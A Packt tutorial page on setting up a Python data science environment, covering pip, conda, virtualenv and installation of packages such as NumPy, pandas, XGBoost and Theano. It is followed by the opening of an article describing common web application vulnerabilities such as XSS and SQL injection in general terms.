Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

6719 Articles
article-image-getting-started-python-packages
Packt
02 Nov 2016
37 min read
Save for later

Getting Started with Python Packages

Packt
02 Nov 2016
37 min read
In this article by Luca Massaron and Alberto Boschetti the authors of the book Python Data Science Essentials - Second Edition we will cover steps on installing Python, the different installation packages and have a glance at the essential packages will constitute a complete Data Science Toolbox. (For more resources related to this topic, see here.) Whether you are an eager learner of data science or a well-grounded data science practitioner, you can take advantage of this essential introduction to Python for data science. You can use it to the fullest if you already have at least some previous experience in basic coding, in writing general-purpose computer programs in Python, or in some other data-analysis-specific language such as MATLAB or R. Introducing data science and Python Data science is a relatively new knowledge domain, though its core components have been studied and researched for many years by the computer science community. Its components include linear algebra, statistical modelling, visualization, computational linguistics, graph analysis, machine learning, business intelligence, and data storage and retrieval. Data science is a new domain and you have to take into consideration that currently its frontiers are still somewhat blurred and dynamic. Since data science is made of various constituent sets of disciplines, please also keep in mind that there are different profiles of data scientists depending on their competencies and areas of expertise. In such a situation, what can be the best tool of the trade that you can learn and effectively use in your career as a data scientist? We believe that the best tool is Python, and we intend to provide you with all the essential information that you will need for a quick start. In addition, other tools such as R and MATLAB provide data scientists with specialized tools to solve specific problems in statistical analysis and matrix manipulation in data science. However, only Python really completes your data scientist skill set. This multipurpose language is suitable for both development and production alike; it can handle small- to large-scale data problems and it is easy to learn and grasp no matter what your background or experience is. Created in 1991 as a general-purpose, interpreted, and object-oriented language, Python has slowly and steadily conquered the scientific community and grown into a mature ecosystem of specialized packages for data processing and analysis. It allows you to have uncountable and fast experimentations, easy theory development, and prompt deployment of scientific applications. At present, the core Python characteristics that render it an indispensable data science tool are as follows: It offers a large, mature system of packages for data analysis and machine learning. It guarantees that you will get all that you may need in the course of a data analysis, and sometimes even more. Python can easily integrate different tools and offers a truly unifying ground for different languages, data strategies, and learning algorithms that can be fitted together easily and which can concretely help data scientists forge powerful solutions. There are packages that allow you to call code in other languages (in Java, C, FORTRAN, R, or Julia), outsourcing some of the computations to them and improving your script performance. It is very versatile. No matter what your programming background or style is (object-oriented, procedural, or even functional), you will enjoy programming with Python. It is cross-platform; your solutions will work perfectly and smoothly on Windows, Linux, and Mac OS systems. You won't have to worry all that much about portability. Although interpreted, it is undoubtedly fast compared to other mainstream data analysis languages such as R and MATLAB (though it is not comparable to C, Java, and the newly emerged Julia language). Moreover, there are also static compilers such as Cython or just-in-time compilers such as PyPy that can transform Python code into C for higher performance. It can work with large in-memory data because of its minimal memory footprint and excellent memory management. The memory garbage collector will often save the day when you load, transform, dice, slice, save, or discard data using various iterations and reiterations of data wrangling. It is very simple to learn and use. After you grasp the basics, there's no better way to learn more than by immediately starting with the coding. Moreover, the number of data scientists using Python is continuously growing: new packages and improvements have been released by the community every day, making the Python ecosystem an increasingly prolific and rich language for data science. Installing Python First, let's proceed to introduce all the settings you need in order to create a fully working data science environment to test the examples and experiment with the code that we are going to provide you with. Python is an open source, object-oriented, and cross-platform programming language. Compared to some of its direct competitors (for instance, C++ or Java), Python is very concise.  It allows you to build a working software prototype in a very short time. Yet it has become the most used language in the data scientist's toolbox not just because of that. It is also a general-purpose language, and it is very flexible due to a variety of available packages that solve a wide spectrum of problems and necessities. Python 2 or Python 3? There are two main branches of Python: 2.7.x and 3.x. At the time of writing this article, the Python foundation (www.python.org) is offering downloads for Python version 2.7.11 and 3.5.1. Although the third version is the newest, the older one is still the most used version in the scientific area, since a few packages (check on the website py3readiness.org for a compatibility overview) won't run otherwise yet. In addition, there is no immediate backward compatibility between Python 3 and 2. In fact, if you try to run some code developed for Python 2 with a Python 3 interpreter, it may not work. Major changes have been made to the newest version, and that has affected past compatibility. Some data scientists, having built most of their work on Python 2 and its packages, are reluctant to switch to the new version. We intend to address a larger audience of data scientists, data analysts and developers, who may not have such a strong legacy with Python 2. Thus, we agreed that it would be better to work with Python 3 rather than the older version. We suggest using a version such as Python 3.4 or above. After all, Python 3 is the present and the future of Python. It is the only version that will be further developed and improved by the Python foundation and it will be the default version of the future on many operating systems. Anyway, if you are currently working with version 2 and you prefer to keep on working with it, you can still the examples. In fact, for the most part, our code will simply work on Python 2 after having the code itself preceded by these imports: from __future__ import (absolute_import, division, print_function, unicode_literals) from builtins import * from future import standard_library standard_library.install_aliases() The from __future__ import commands should always occur at the beginning of your scripts or else you may experience Python reporting an error. As described in the Python-future website (python-future.org), these imports will help convert several Python 3-only constructs to a form compatible with both Python 3 and Python 2 (and in any case, most Python 3 code should just simply work on Python 2 even without the aforementioned imports). In order to run the upward commands successfully, if the future package is not already available on your system, you should install it (version >= 0.15.2) using the following command to be executed from a shell: $> pip install –U future If you're interested in understanding the differences between Python 2 and Python 3 further, we recommend reading the wiki page offered by the Python foundation itself: wiki.python.org/moin/Python2orPython3. Step-by-step installation Novice data scientists who have never used Python (who likely don't have the language readily installed on their machines) need to first download the installer from the main website of the project, www.python.org/downloads/, and then install it on their local machine. We will now coversteps which will provide you with full control over what can be installed on your machine. This is very useful when you have to set up single machines to deal with different tasks in data science. Anyway, please be warned that a step-by-step installation really takes time and effort. Instead, installing a ready-made scientific distribution will lessen the burden of installation procedures and it may be well suited for first starting and learning because it saves you time and sometimes even trouble, though it will put a large number of packages (and we won't use most of them) on your computer all at once. This being a multiplatform programming language, you'll find installers for machines that either run on Windows or Unix-like operating systems. Please remember that some of the latest versions of most Linux distributions (such as CentOS, Fedora, Red Hat Enterprise, and Ubuntu) have Python 2 packaged in the repository. In such a case and in the case that you already have a Python version on your computer (since our examples run on Python 3), you first have to check what version you are exactly running. To do such a check, just follow these instructions: Open a python shell, type python in the terminal, or click on any Python icon you find on your system. Then, after having Python started, to test the installation, run the following code in the Python interactive shell or REPL: >>> import sys >>> print (sys.version_info) If you can read that your Python version has the major=2 attribute, it means that you are running a Python 2 instance. Otherwise, if the attribute is valued 3, or if the print statements reports back to you something like v3.x.x (for instance v3.5.1), you are running the right version of Python and you are ready to move forward. To clarify the operations we have just mentioned, when a command is given in the terminal command line, we prefix the command with $>. Otherwise, if it's for the Python REPL, it's preceded by >>>. The installation of packages Python won't come bundled with all you need, unless you take a specific premade distribution. Therefore, to install the packages you need, you can use either pip or easy_install. Both these two tools run in the command line and make the process of installation, upgrade, and removal of Python packages a breeze. To check which tools have been installed on your local machine, run the following command: $> pip To install pip, follow the instructions given at pip.pypa.io/en/latest/installing.html. Alternatively, you can also run this command: $> easy_install If both of these commands end up with an error, you need to install any one of them. We recommend that you use pip because it is thought of as an improvement over easy_install. Moreover, easy_install is going to be dropped in future and pip has important advantages over it. It is preferable to install everything using pip because: It is the preferred package manager for Python 3. Starting with Python 2.7.9 and Python 3.4, it is included by default with the Python binary installers. It provides an uninstall functionality. It rolls back and leaves your system clear if, for whatever reason, the package installation fails. Using easy_install in spite of pip's advantages makes sense if you are working on Windows because pip won't always install pre-compiled binary packages.Sometimes it will try to build the package's extensions directly from C source, thus requiring a properly configured compiler (and that's not an easy task on Windows). This depends on whether the package is running on eggs (and pip cannot directly use their binaries, but it needs to build from their source code) or wheels (in this case, pip can install binaries if available, as explained here: pythonwheels.com/). Instead, easy_install will always install available binaries from eggs and wheels. Therefore, if you are experiencing unexpected difficulties installing a package, easy_install can save your day (at some price anyway, as we just mentioned in the list). The most recent versions of Python should already have pip installed by default. Therefore, you may have it already installed on your system. If not, the safest way is to download the get-pi.py script from bootstrap.pypa.io/get-pip.py and then run it using the following: $> python get-pip.py The script will also install the setup tool from pypi.python.org/pypi/setuptools, which also contains easy_install. You're now ready to install the packages you need in order to run the examples provided in this article. To install the < package-name > generic package, you just need to run this command: $> pip install < package-name > Alternatively, you can run the following command: $> easy_install < package-name > Note that in some systems, pip might be named as pip3 and easy_install as easy_install-3 to stress the fact that both operate on packages for Python 3. If you're unsure, check the version of Python pip is operating on with: $> pip –V For easy_install, the command is slightly different: $> easy_install --version After this, the <pk> package and all its dependencies will be downloaded and installed. If you're not certain whether a library has been installed or not, just try to import a module inside it. If the Python interpreter raises an ImportError error, it can be concluded that the package has not been installed. This is what happens when the NumPy library has been installed: >>> import numpy This is what happens if it's not installed: >>> import numpy Traceback (most recent call last): File "<stdin>", line 1, in <module> ImportError: No module named numpy In the latter case, you'll need to first install it through pip or easy_install. Take care that you don't confuse packages with modules. With pip, you install a package; in Python, you import a module. Sometimes, the package and the module have the same name, but in many cases, they don't match. For example, the sklearn module is included in the package named Scikit-learn. Finally, to search and browse the Python packages available for Python, look at pypi.python.org. Package upgrades More often than not, you will find yourself in a situation where you have to upgrade a package because either the new version is required by a dependency or it has additional features that you would like to use. First, check the version of the library you have installed by glancing at the __version__ attribute, as shown in the following example, numpy: >>> import numpy >>> numpy.__version__ # 2 underscores before and after '1.9.2' Now, if you want to update it to a newer release, say the 1.11.0 version, you can run the following command from the command line: $> pip install -U numpy==1.11.0 Alternatively, you can use the following command: $> easy_install --upgrade numpy==1.11.0 Finally, if you're interested in upgrading it to the latest available version, simply run this command: $> pip install -U numpy You can alternatively run the following command: $> easy_install --upgrade numpy Scientific distributions As you've read so far, creating a working environment is a time-consuming operation for a data scientist. You first need to install Python and then, one by one, you can install all the libraries that you will need (sometimes, the installation procedures may not go as smoothly as you'd hoped for earlier). If you want to save time and effort and want to ensure that you have a fully working Python environment that is ready to use, you can just download, install, and use the scientific Python distribution. Apart from Python, they also include a variety of preinstalled packages, and sometimes, they even have additional tools and an IDE. A few of them are very well known among data scientists, and in the following content, you will find some of the key features of each of these packages. We suggest that you promptly download and install a scientific distribution, such as Anaconda (which is the most complete one). Anaconda (continuum.io/downloads) is a Python distribution offered by Continuum Analytics that includes nearly 200 packages, which comprises NumPy, SciPy, pandas, Jupyter, Matplotlib, Scikit-learn, and NLTK. It's a cross-platform distribution (Windows, Linux, and Mac OS X) that can be installed on machines with other existing Python distributions and versions. Its base version is free; instead, add-ons that contain advanced features are charged separately. Anaconda introduces conda, a binary package manager, as a command-line tool to manage your package installations. As stated on the website, Anaconda's goal is to provide enterprise-ready Python distribution for large-scale processing, predictive analytics, and scientific computing. Leveraging conda to install packages If you've decided to install an Anaconda distribution, you can take advantage of the conda binary installer we mentioned previously. Anyway, conda is an open source package management system, and consequently it can be installed separately from an Anaconda distribution. You can test immediately whether conda is available on your system. Open a shell and digit: $> conda -V If conda is available, there will appear the version of your conda; otherwise an error will be reported. If conda is not available, you can quickly install it on your system by going to conda.pydata.org/miniconda.html and installing the Miniconda software suitable for your computer. Miniconda is a minimal installation that only includes conda and its dependencies. conda can help you manage two tasks: installing packages and creating virtual environments. In this paragraph, we will explore how conda can help you easily install most of the packages you may need in your data science projects. Before starting, please check to have the latest version of conda at hand: $> conda update conda Now you can install any package you need. To install the <package-name> generic package, you just need to run the following command: $> conda install <package-name> You can also install a particular version of the package just by pointing it out: $> conda install <package-name>=1.11.0 Similarly you can install multiple packages at once by listing all their names: $> conda install <package-name-1> <package-name-2> If you just need to update a package that you previously installed, you can keep on using conda: $> conda update <package-name> You can update all the available packages simply by using the --all argument: $> conda update --all Finally, conda can also uninstall packages for you: $> conda remove <package-name> If you would like to know more about conda, you can read its documentation at conda.pydata.org/docs/index.html. In summary, as a main advantage, it handles binaries even better than easy_install (by always providing a successful installation on Windows without any need to compile the packages from source) but without its problems and limitations. With the use of conda, packages are easy to install (and installation is always successful), update, and even uninstall. On the other hand, conda cannot install directly from a git server (so it cannot access the latest version of many packages under development) and it doesn't cover all the packages available on PyPI as pip itself. Enthought Canopy Enthought Canopy (enthought.com/products/canopy) is a Python distribution by Enthought Inc. It includes more than 200 preinstalled packages, such as NumPy, SciPy, Matplotlib, Jupyter, and pandas. This distribution is targeted at engineers, data scientists, quantitative and data analysts, and enterprises. Its base version is free (which is named Canopy Express), but if you need advanced features, you have to buy a front version. It's a multiplatform distribution and its command-line install tool is canopy_cli. PythonXY PythonXY (python-xy.github.io) is a free, open source Python distribution maintained by the community. It includes a number of packages, which include NumPy, SciPy, NetworkX, Jupyter, and Scikit-learn. It also includes Spyder, an interactive development environment inspired by the MATLAB IDE. The distribution is free. It works only on Microsoft Windows, and its command-line installation tool is pip. WinPython WinPython (winpython.sourceforge.net) is also a free, open-source Python distribution maintained by the community. It is designed for scientists, and includes many packages such as NumPy, SciPy, Matplotlib, and Jupyter. It also includes Spyder as an IDE. It is free and portable. You can put WinPython into any directory, or even into a USB flash drive, and at the same time maintain multiple copies and versions of it on your system. It works only on Microsoft Windows, and its command-line tool is the WinPython Package Manager (WPPM). Explaining virtual environments No matter you have chosen installing a stand-alone Python or instead you used a scientific distribution, you may have noticed that you are actually bound on your system to the Python's version you have installed. The only exception, for Windows users, is to use a WinPython distribution, since it is a portable installation and you can have as many different installations as you need. A simple solution to break free of such a limitation is to use virtualenv that is a tool to create isolated Python environments. That means, by using different Python environments, you can easily achieve these things: Testing any new package installation or doing experimentation on your Python environment without any fear of breaking anything in an irreparable way. In this case, you need a version of Python that acts as a sandbox. Having at hand multiple Python versions (both Python 2 and Python 3), geared with different versions of installed packages. This can help you in dealing with different versions of Python for different purposes (for instance, some of the packages we are going to present on Windows OS only work using Python 3.4, which is not the latest release). Taking a replicable snapshot of your Python environment easily and having your data science prototypes work smoothly on any other computer or in production. In this case, your main concern is the immutability and replicability of your working environment. You can find documentation about virtualenv at virtualenv.readthedocs.io/en/stable, though we are going to provide you with all the directions you need to start using it immediately. In order to take advantage of virtualenv, you have first to install it on your system: $> pip install virtualenv After the installation completes, you can start building your virtual environments. Before proceeding, you have to take a few decisions: If you have more versions of Python installed on your system, you have to decide which version to pick up. Otherwise, virtualenv will take the Python version virtualenv was installed by on your system. In order to set a different Python version you have to digit the argument –p followed by the version of Python you want or inserting the path of the Python executable to be used (for instance, –p python2.7 or just pointing to a Python executable such as -p c:Anaconda2python.exe). With virtualenv, when required to install a certain package, it will install it from scratch, even if it is already available at a system level (on the python directory you created the virtual environment from). This default behavior makes sense because it allows you to create a completely separated empty environment. In order to save disk space and limit the time of installation of all the packages, you may instead decide to take advantage of already available packages on your system by using the argument --system-site-packages. You may want to be able to later move around your virtual environment across Python installations, even among different machines. Therefore you may want to make the functioning of all of the environment's scripts relative to the path it is placed in by using the argument --relocatable. After deciding on the Python version, the linking to existing global packages, and the relocability of the virtual environment, in order to start, you just launch the command from a shell. Declare the name you would like to assign to your new environment: $> virtualenv clone virtualenv will just create a new directory using the name you provided, in the path from which you actually launched the command. To start using it, you just enter the directory and digit activate: $> cd clone $> activate At this point, you can start working on your separated Python environment, installing packages and working with code. If you need to install multiple packages at once, you may need some special function from pip—pip freeze—which will enlist all the packages (and their version) you have installed on your system. You can record the entire list in a text file by this command: $> pip freeze > requirements.txt After saving the list in a text file, just take it into your virtual environment and install all the packages in a breeze with a single command: $> pip install -r requirements.txt Each package will be installed according to the order in the list (packages are listed in a case-insensitive sorted order). If a package requires other packages that are later in the list, that's not a big deal because pip automatically manages such situations. So if your package requires Numpy and Numpy is not yet installed, pip will install it first. When you're finished installing packages and using your environment for scripting and experimenting, in order to return to your system defaults, just issue this command: $> deactivate If you want to remove the virtual environment completely, after deactivating and getting out of the environment's directory, you just have to get rid of the environment's directory itself by a recursive deletion. For instance, on Windows you just do this: $> rd /s /q clone On Linux and Mac, the command will be: $> rm –r –f clone If you are working extensively with virtual environments, you should consider using virtualenvwrapper, which is a set of wrappers for virtualenv in order to help you manage multiple virtual environments easily. It can be found at bitbucket.org/dhellmann/virtualenvwrapper. If you are operating on a Unix system (Linux or OS X), another solution we have to quote is pyenv (which can be found at https://github.com/yyuu/pyenv). It lets you set your main Python version, allow installation of multiple versions, and create virtual environments. Its peculiarity is that it does not depend on Python to be installed and works perfectly at the user level (no need for sudo commands). conda for managing environments If you have installed the Anaconda distribution, or you have tried conda using a Miniconda installation, you can also take advantage of the conda command to run virtual environments as an alternative to virtualenv. Let's see in practice how to use conda for that. We can check what environments we have available like this: >$ conda info -e This command will report to you what environments you can use on your system based on conda. Most likely, your only environment will be just "root", pointing to your Anaconda distribution's folder. As an example, we can create an environment based on Python version 3.4, having all the necessary Anaconda-packaged libraries installed. That makes sense, for instance, for using the package Theano together with Python 3 on Windows (because of an issue we will explain in a few paragraphs). In order to create such an environment, just do: $> conda create -n python34 python=3.4 anaconda The command asks for a particular python version (3.4) and requires the installation of all packages available on the anaconda distribution (the argument anaconda). It names the environment as python34 using the argument –n. The complete installation should take a while, given the large number of packages in the Anaconda installation. After having completed all of the installation, you can activate the environment: $> activate python34 If you need to install additional packages to your environment, when activated, you just do: $> conda install -n python34 <package-name1> <package-name2> That is, you make the list of the required packages follow the name of your environment. Naturally, you can also use pip install, as you would do in a virtualenv environment. You can also use a file instead of listing all the packages by name yourself. You can create a list in an environment using the list argument and piping the output to a file: $> conda list -e > requirements.txt Then, in your target environment, you can install the entire list using: $> conda install --file requirements.txt You can even create an environment, based on a requirements' list: $> conda create -n python34 python=3.4 --file requirements.txt Finally, after having used the environment, to close the session, you simply do this: $> deactivate Contrary to virtualenv, there is a specialized argument in order to completely remove an environment from your system: $> conda remove -n python34 --all A glance at the essential packages We mentioned that the two most relevant characteristics of Python are its ability to integrate with other languages and its mature package system, which is well embodied by PyPI (the Python Package Index: pypi.python.org/pypi), a common repository for the majority of Python open source packages that is constantly maintained and updated. The packages that we are now going to introduce are strongly analytical and they will constitute a complete Data Science Toolbox. All the packages are made up of extensively tested and highly optimized functions for both memory usage and performance, ready to achieve any scripting operation with successful execution. A walkthrough on how to install them is provided next. Partially inspired by similar tools present in R and MATLAB environments, we will together explore how a few selected Python commands can allow you to efficiently handle data and then explore, transform, experiment, and learn from the same without having to write too much code or reinvent the wheel. NumPy NumPy, which is Travis Oliphant's creation, is the true analytical workhorse of the Python language. It provides the user with multidimensional arrays, along with a large set of functions to operate a multiplicity of mathematical operations on these arrays. Arrays are blocks of data arranged along multiple dimensions, which implement mathematical vectors and matrices. Characterized by optimal memory allocation, arrays are useful not just for storing data, but also for fast matrix operations (vectorization), which are indispensable when you wish to solve ad hoc data science problems: Website: www.numpy.org Version at the time of print: 1.11.0 Suggested install command: pip install numpy As a convention largely adopted by the Python community, when importing NumPy, it is suggested that you alias it as np: import numpy as np SciPy An original project by Travis Oliphant, Pearu Peterson, and Eric Jones, SciPy completes NumPy's functionalities, offering a larger variety of scientific algorithms for linear algebra, sparse matrices, signal and image processing, optimization, fast Fourier transformation, and much more: Website: www.scipy.org Version at time of print: 0.17.1 Suggested install command: pip install scipy pandas The pandas package deals with everything that NumPy and SciPy cannot do. Thanks to its specific data structures, namely DataFrames and Series, pandas allows you to handle complex tables of data of different types (which is something that NumPy's arrays cannot do) and time series. Thanks to Wes McKinney's creation, you will be able easily and smoothly to load data from a variety of sources. You can then slice, dice, handle missing elements, add, rename, aggregate, reshape, and finally visualize your data at will: Website: pandas.pydata.org Version at the time of print: 0.18.1 Suggested install command: pip install pandas Conventionally, pandas is imported as pd: import pandas as pd Scikit-learn Started as part of the SciKits (SciPy Toolkits), Scikit-learn is the core of data science operations on Python. It offers all that you may need in terms of data preprocessing, supervised and unsupervised learning, model selection, validation, and error metrics. Scikit-learn started in 2007 as a Google Summer of Code project by David Cournapeau. Since 2013, it has been taken over by the researchers at INRA (French Institute for Research in Computer Science and Automation): Website: scikit-learn.org/stable Version at the time of print: 0.17.1 Suggested install command: pip install scikit-learn Note that the imported module is named sklearn. Jupyter A scientific approach requires the fast experimentation of different hypotheses in a reproducible fashion. Initially named IPython and limited to working only with the Python language, Jupyter was created by Fernando Perez in order to address the need for an interactive Python command shell (which is based on shell, web browser, and the application interface), with graphical integration, customizable commands, rich history (in the JSON format), and computational parallelism for an enhanced performance. Jupyter is our favoured choice; it is used to clearly and effectively illustrate operations with scripts and data, and the consequent results: Website: jupyter.org Version at the time of print: 1.0.0 (ipykernel = 4.3.1) Suggested install command: pip install jupyter Matplotlib Originally developed by John Hunter, matplotlib is a library that contains all the building blocks that are required to create quality plots from arrays and to visualize them interactively. You can find all the MATLAB-like plotting frameworks inside the pylab module: Website: matplotlib.org Version at the time of print: 1.5.1 Suggested install command: pip install matplotlib You can simply import what you need for your visualization purposes with the following command: import matplotlib.pyplot as plt Statsmodels Previously part of SciKits, statsmodels was thought to be a complement to SciPy's statistical functions. It features generalized linear models, discrete choice models, time series analysis, and a series of descriptive statistics as well as parametric and nonparametric tests: Website: statsmodels.sourceforge.net Version at the time of print: 0.6.1 Suggested install command: pip install statsmodels Beautiful Soup Beautiful Soup, a creation of Leonard Richardson, is a great tool to scrap out data from HTML and XML files retrieved from the Internet. It works incredibly well, even in the case of tag soups (hence the name), which are collections of malformed, contradictory, and incorrect tags. After choosing your parser (the HTML parser included in Python's standard library works fine), thanks to Beautiful Soup, you can navigate through the objects in the page and extract text, tables, and any other information that you may find useful: Website: www.crummy.com/software/BeautifulSoup Version at the time of print: 4.4.1 Suggested install command: pip install beautifulsoup4 Note that the imported module is named bs4. NetworkX Developed by the Los Alamos National Laboratory, NetworkX is a package specialized in the creation, manipulation, analysis, and graphical representation of real-life network data (it can easily operate with graphs made up of a million nodes and edges). Besides specialized data structures for graphs and fine visualization methods (2D and 3D), it provides the user with many standard graph measures and algorithms, such as the shortest path, centrality, components, communities, clustering, and PageRank. Website: networkx.github.io Version at the time of print: 1.11 Suggested install command: pip install networkx Conventionally, NetworkX is imported as nx: import networkx as nx NLTK The Natural Language Toolkit (NLTK) provides access to corpora and lexical resources and to a complete suite of functions for statistical Natural Language Processing (NLP), ranging from tokenizers to part-of-speech taggers and from tree models to named-entity recognition. Initially, Steven Bird and Edward Loper created the package as an NLP teaching infrastructure for their course at the University of Pennsylvania. Now, it is a fantastic tool that you can use to prototype and build NLP systems: Website: www.nltk.org Version at the time of print: 3.2.1 Suggested install command: pip install nltk Gensim Gensim, programmed by Radim Rehurek, is an open source package that is suitable for the analysis of large textual collections with the help of parallel distributable online algorithms. Among advanced functionalities, it implements Latent Semantic Analysis (LSA), topic modelling by Latent Dirichlet Allocation (LDA), and Google's word2vec, a powerful algorithm that transforms text into vector features that can be used in supervised and unsupervised machine learning. Website: radimrehurek.com/gensim Version at the time of print: 0.12.4 Suggested install command: pip install gensim PyPy PyPy is not a package; it is an alternative implementation of Python 2.7.8 that supports most of the commonly used Python standard packages (unfortunately, NumPy is currently not fully supported). As an advantage, it offers enhanced speed and memory handling. Thus, it is very useful for heavy duty operations on large chunks of data and it should be part of your big data handling strategies: Website: pypy.org/ Version at time of print: 5.1 Download page: pypy.org/download.html XGBoost XGBoost is a scalable, portable, and distributed gradient boosting library (a tree ensemble machine learning algorithm). Initially created by Tianqi Chen from Washington University, it has been enriched by a Python wrapper by Bing Xu and an R interface by Tong He (you can read the story behind XGBoost directly from its principal creator at homes.cs.washington.edu/~tqchen/2016/03/10/story-and-lessons-behind-the-evolution-of-xgboost.html). XGBoost is available for Python, R, Java, Scala, Julia, and C++, and it can work on a single machine (leveraging multithreading) in both Hadoop and Spark clusters: Website: xgboost.readthedocs.io/en/latest Version at the time of print: 0.4 Download page: github.com/dmlc/xgboost Detailed instructions for installing XGBoost on your system can be found at this page: github.com/dmlc/xgboost/blob/master/doc/build.md The installation of XGBoost on both Linux and MacOS is quite straightforward, whereas it is a little bit trickier for Windows users. On a Posix system you just have For this reason, we provide specific installation steps to get XGBoost working on Windows: First download and install Git for Windows (git-for-windows.github.io). Then you need a MINGW compiler present on your system. You can download it from www.mingw.org accordingly to the characteristics of your system. From the command line, execute: $> git clone --recursive https://github.com/dmlc/xgboost $> cd xgboost $> git submodule init $> git submodule update Then, always from command line, copy the configuration for 64-byte systems to be the default one: $> copy makemingw64.mk config.mk Alternatively, you just copy the plain 32-byte version: $> copy makemingw.mk config.mk After copying the configuration file, you can run the compiler, setting it to use four threads in order to speed up the compiling procedure: $> mingw32-make -j4 In MinGW, the make command comes with the name mingw32-make. If you are using a different compiler, the previous command may not work; then you can simply try: $> make -j4 Finally, if the compiler completes its work without errors, you can install the package in your Python by this: $> cd python-package $> python setup.py install After following all the preceding instructions, if you try to import XGBoost in Python and yet it doesn't load and results in an error, it may well be that Python cannot find the MinGW's g++ runtime libraries. You just need to find the location on your computer of MinGW's binaries (in our case, it was in C:mingw-w64mingw64bin; just modify the next code to put yours) and place the following code snippet before importing XGBoost: import os mingw_path = 'C:\mingw-w64\mingw64\bin' os.environ['PATH']=mingw_path + ';' + os.environ['PATH'] import xgboost as xgb Depending on the state of the XGBoost project, similarly to many other projects under continuous development, the preceding installation commands may or may not temporarily work at the time you will try them. Usually waiting for an update of the project or opening an issue with the authors of the package may solve the problem. Theano Theano is a Python library that allows you to define, optimize, and evaluate mathematical expressions involving multi-dimensional arrays efficiently. Basically, it provides you with all the building blocks you need to create deep neural networks. Created by academics (an entire development team; you can read their names on their most recent paper at arxiv.org/pdf/1605.02688.pdf), Theano has been used for large scale and intensive computations since 2007: Website: deeplearning.net/software/theano Release at the time of print: 0.8.2 In spite of many installation problems experienced by users in the past (expecially Windows users), the installation of Theano should be straightforward, the package being now available on PyPI: $> pip install Theano If you want the most updated version of the package, you can get it by Github cloning: $> git clone git://github.com/Theano/Theano.git Then you can proceed with direct Python installation: $> cd Theano $> python setup.py install To test your installation, you can run from shell/CMD and verify the reports: $> pip install nose $> pip install nose-parameterized $> nosetests theano If you are working on a Windows OS and the previous instructions don't work, you can try these steps using the conda command provided by the Anaconda distribution: Install TDM GCC x64 (this can be found at tdm-gcc.tdragon.net) Open an Anaconda prompt interface and execute: $> conda update conda $> conda update --all $> conda install mingw libpython $> pip install git+git://github.com/Theano/Theano.git Theano needs libpython, which isn't compatible yet with the version 3.5. So if your Windows installation is not working, this could be the likely cause. Anyway, Theano installs perfectly on Python version 3.4. Our suggestion in this case is to create a virtual Python environment based on version 3.4, install, and use Theano only on that specific version. Directions on how to create virtual environments are provided in the paragraph about virtualenv and conda create. In addition, Theano's website provides some information to Windows users; it could support you when everything else fails: deeplearning.net/software/theano/install_windows.html An important requirement for Theano to scale out on GPUs is to install Nvidia CUDA drivers and SDK for code generation and execution on GPU. If you do not know too much about the CUDA Toolkit, you can actually start from this web page in order to understand more about the technology being used: developer.nvidia.com/cuda-toolkit Therefore, if your computer has an NVidia GPU, you can find all the necessary instructions in order to install CUDA using this tutorial page from NVidia itself: docs.nvidia.com/cuda/cuda-quick-start-guide/index.html Keras Keras is a minimalist and highly modular neural networks library, written in Python and capable of running on top of either Theano or TensorFlow (the source software library for numerical computation released by Google). Keras was created by François Chollet, a machine learning researcher working at Google: Website: keras.io Version at the time of print: 1.0.3 Suggested installation from PyPI: $> pip install keras As an alternative, you can install the latest available version (which is advisable since the package is in continuous development) using the command: $> pip install git+git://github.com/fchollet/keras.git Summary In this article, we performed a lot of installations, from Python packages to examples.They were installed either directly or by using a scientific distribution. We also introduced Jupyter notebooks and demonstrated how you can have access to the data run in the tutorials. Resources for Article: Further resources on this subject: Python for Driving Hardware [Article] Mining Twitter with Python – Influence and Engagement [Article] Python Data Structures [Article]
Read more
  • 0
  • 0
  • 7169

article-image-why-secure-web-based-applications-with-kali-linux
Guest Contributor
12 Dec 2019
12 min read
Save for later

Why secure web-based applications with Kali Linux?

Guest Contributor
12 Dec 2019
12 min read
The security of web-based applications is of critical importance. The strength of an application is about more than the collection of features it provides. It includes essential (yet often overlooked) elements such as security. Kali Linux is a trusted critical component of a security professional’s toolkit for securing web applications. The official documentation says it is “is specifically geared to meet the requirements of professional penetration testing and security auditing.“ Incidences of security breaches in web-based applications can be largely contained through the deployment of Kali Linux’s suite of up-to-date software. Build secure systems with Kali Linux... If you wish to employ advanced pentesting techniques with Kali Linux to build highly secured systems, you should check out our recent book Mastering Kali Linux for Advanced Penetration Testing - Third Edition written by Vijay Kumar Velu and Robert Beggs. This book will help you discover concepts such as social engineering, attacking wireless networks, web services, and embedded devices. What it means to secure Web-based applications There is a branch of information security dealing with the security of websites and web services (such as APIs), the same area that deals with securing web-based applications. For web-based businesses, web application security is a central component. The Internet serves a global population and is used in almost every walk of life one may imagine. As such, web properties can be attacked from various locations and with variable levels of complexity and scale. It is therefore critical to have protection against a variety of security threats that take advantage of vulnerabilities in an application’s code. Common web-based application targets are SaaS (Software-as-a-Service) applications and content management systems like WordPress. A web-based application is a high-priority target if: the source code is complex enough to increase the possibility of vulnerabilities that are not contained and result in malicious code manipulation, the source code contains exploitable bugs, especially where code is not tested extensively, it can provide rewards of high value, including sensitive private data, after successful manipulation of source code, attacking it is easy to execute since most attacks are easy to automate and launch against multiple targets. Failing to secure its web-based application opens an organization up to attacks. Common consequences include information theft, damaged client relationships, legal proceedings, and revoked licenses. Common Web App Security Vulnerabilities A wide variety of attacks are available in the wild for web-based applications. These include targeted database manipulation and large-scale network disruption. Following are a few vectors or methods of attacks used by attackers: Data breaches A data breach differs from specific attack vectors. A data breach generally refers to the release of private or confidential information. It can stem from mistakes or due to malicious action. Data breaches cover a broad scope and could consist of several highly valuable records to millions of exposed user accounts. Common examples of data breaches include Cambridge Analytica and Ashley Madison. Cross-site scripting (XSS) It is a vulnerability that gives an attacker a way to inject client-side scripts into a webpage. The attacker can also directly access relevant information, impersonate a user, or trick them into divulging valuable information. A perpetrator could notice a vulnerability in an e-commerce site that permits embedding of HTML tags in the site’s comments section. The embedded tags feature permanently on the page, causing the browser to parse them along with other source code each time the page is accessed. SQL injection (SQLi) A method whereby a web security vulnerability allows an attacker to interfere with the queries that an application makes to its database. With this, an attacker can view data that they could normally not retrieve. Attackers may also modify or create fresh user permissions, manipulate or 